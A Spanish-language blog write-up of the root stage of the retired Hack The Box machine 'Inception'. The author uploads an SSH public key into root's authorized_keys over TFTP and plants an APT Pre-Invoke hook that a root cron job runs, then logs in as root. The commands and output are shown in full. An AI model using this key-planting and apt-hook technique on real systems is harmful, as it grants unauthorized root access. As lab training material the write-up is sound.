<p>Nos conectamos como el usuario <code class="language-plaintext highlighter-rouge">anonymous</code> sin password al <code class="language-plaintext highlighter-rouge">servicio FTP</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ftp&gt; <span class="nb">cd </span>root
550 Failed to change directory.
</code></pre></div></div>
<p>Intentamos acceder al directorio root y vemos que no lo conseguimos.. 
Probamos a listar <code class="language-plaintext highlighter-rouge">tareas cron</code> desde el servicio <code class="language-plaintext highlighter-rouge">FTP</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span><span class="nb">cat </span>crontab 
<span class="c"># /etc/crontab: system-wide crontab</span>
<span class="c"># Unlike any other crontab you don't have to run the `crontab'</span>
<span class="c"># command to install the new version when you edit this file</span>
<span class="c"># and files in /etc/cron.d. These files also have username fields,</span>
<span class="c"># that none of the other crontabs do.</span>

<span class="nv">SHELL</span><span class="o">=</span>/bin/sh
<span class="nv">PATH</span><span class="o">=</span>/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

<span class="c"># m h dom mon dow user  command</span>
17 <span class="k">*</span>    <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.hourly
25 6    <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    <span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.daily <span class="o">)</span>
47 6    <span class="k">*</span> <span class="k">*</span> 7   root    <span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.weekly <span class="o">)</span>
52 6    1 <span class="k">*</span> <span class="k">*</span>   root    <span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.monthly <span class="o">)</span>
<span class="k">*</span>/5 <span class="k">*</span>   <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    apt update 2&gt;&amp;1 <span class="o">&gt;</span>/var/log/apt/custom.log
30 23   <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    apt upgrade <span class="nt">-y</span> 2&gt;&amp;1 <span class="o">&gt;</span>/dev/null
cobb@Inception:~<span class="nv">$ </span>
</code></pre></div></div>
<p>Y encontramos que se esta haciendo cada 5min una actualizacion del sistema, eso es critico, porque resulta que existe un  Pre Commando que se puede ejecutar tanto antes como despues de ejecutarse el upgrade. <code class="language-plaintext highlighter-rouge">https://www.cyberciti.biz/faq/debian-ubuntu-linux-hook-a-script-command-to-apt-get-upgrade-command/</code></p>

<p>Procedemos de la siguiente forma… Recordamos que tambien existe la utilidad <code class="language-plaintext highlighter-rouge">TFTP</code> con la que si por algun factor nos permitiese subir archivos ya que por <code class="language-plaintext highlighter-rouge">FTP</code> no podemos, podriamos intentar colarle un archivo en la ruta <code class="language-plaintext highlighter-rouge">/etc/apt/apt.conf.d/</code> para intentar ejecutar un commando.</p>

<p>Creandonos una clave SSH publica para intentar subirla a la maquina victima atraves del servicio <code class="language-plaintext highlighter-rouge">TFTP</code> en el directorio <code class="language-plaintext highlighter-rouge">/root/.ssh/</code> llamandola <code class="language-plaintext highlighter-rouge">Authorized_keys</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>ssh-keygen
Generating public/private rsa key pair.
Enter file <span class="k">in </span>which to save the key <span class="o">(</span>/home/cobb/.ssh/id_rsa<span class="o">)</span>: 
Created directory <span class="s1">'/home/cobb/.ssh'</span><span class="nb">.</span>
Enter passphrase <span class="o">(</span>empty <span class="k">for </span>no passphrase<span class="o">)</span>: 
Enter same passphrase again: 
Your identification has been saved <span class="k">in</span> /home/cobb/.ssh/id_rsa.
Your public key has been saved <span class="k">in</span> /home/cobb/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:rXrmYDU7Y998A44tza0EMGOXxrNUw1jJTrw0rlmTPyY cobb@Inception
The key<span class="s1">'s randomart image is:
+---[RSA 2048]----+
|           *+.   |
|         ..oO.   |
|        = B= +   |
|       . O oB    |
|        S ++ o   |
|       . +o.E +  |
|      o *  *.= . |
|     . +o+o+= +  |
|      .+. ..+o . |
+----[SHA256]-----+
cobb@Inception:~$ cd .ssh/
cobb@Inception:~/.ssh$ ls
id_rsa  id_rsa.pub
</span></code></pre></div></div>
<p>Probamos a subir el archivo:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~/.ssh<span class="nv">$ </span>tftp 192.168.0.1
tftp&gt; put id_rsa.pub /root/.ssh/authorized_keys
Sent 397 bytes <span class="k">in </span>0.0 seconds
</code></pre></div></div>
<p>Ahora procedemos a crearnos el archivo para meterlo en la ruta del <code class="language-plaintext highlighter-rouge">/etc/apt/apt.conf.d/</code> y asi ejecutar un comando para darle los permisos necesarios a la clave <code class="language-plaintext highlighter-rouge">athorized_keys</code> para que nos establezca la conexion por <code class="language-plaintext highlighter-rouge">ssh</code> sin proporcionar contraseña.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span><span class="nb">cat </span>access 
APT::Update::Pre-Invoke <span class="o">{</span><span class="s2">"chmod 600 /root/.ssh/authorized_keys"</span><span class="o">}</span><span class="p">;</span>
</code></pre></div></div>
<p>Procedemos a a subir el archivo igual por <code class="language-plaintext highlighter-rouge">TFTP</code> y cuando se ejecute la tarea <code class="language-plaintext highlighter-rouge">CRON</code> deberia inyectarnos este comando establecido</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>tftp 192.168.0.1
tftp&gt; put access /etc/apt/apt.conf.d/access
Sent 69 bytes <span class="k">in </span>0.0 seconds
</code></pre></div></div>
<p>Una vez subido el archivo probamos a conectarnos por SSH a la maquina</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>ssh root@192.168.0.1
The authenticity of host <span class="s1">'192.168.0.1 (192.168.0.1)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:zj8NiAd9po8KKA/z7MGKjn7j6wPFpA2Y6bDTRecUrdE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '</span>192.168.0.1<span class="s1">' (ECDSA) to the list of known hosts.
root@192.168.0.1'</span>s password:
</code></pre></div></div>
<p>Vemos que demomento aun nos pide contraseña para entrar, en el momento que se aplique nuestro comando, conseguiremos entrar sin proporcionar contraseña.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>ssh root@192.168.0.1
Welcome to Ubuntu 16.04.3 LTS <span class="o">(</span>GNU/Linux 4.4.0-101-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Thu Nov 30 20:04:21 2017
root@Inception:~# 
</code></pre></div></div>

<p>Procedemos a sacar la flag <code class="language-plaintext highlighter-rouge">root.txt</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Inception:~# <span class="nb">cat </span>root.txt 
8d1e2e91de427a6fc1a9dc30xxxxxxxxx
</code></pre></div></div>

<p>Maquina Inception <code class="language-plaintext highlighter-rouge">Rooteada</code> - KOH</p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/11/02/Inception-HTB.html';
     this.page.identifier = '/2021/11/02/Inception-HTB';
     this.page.title = 'Maquina Retirada Inception de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada INCEPTION';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
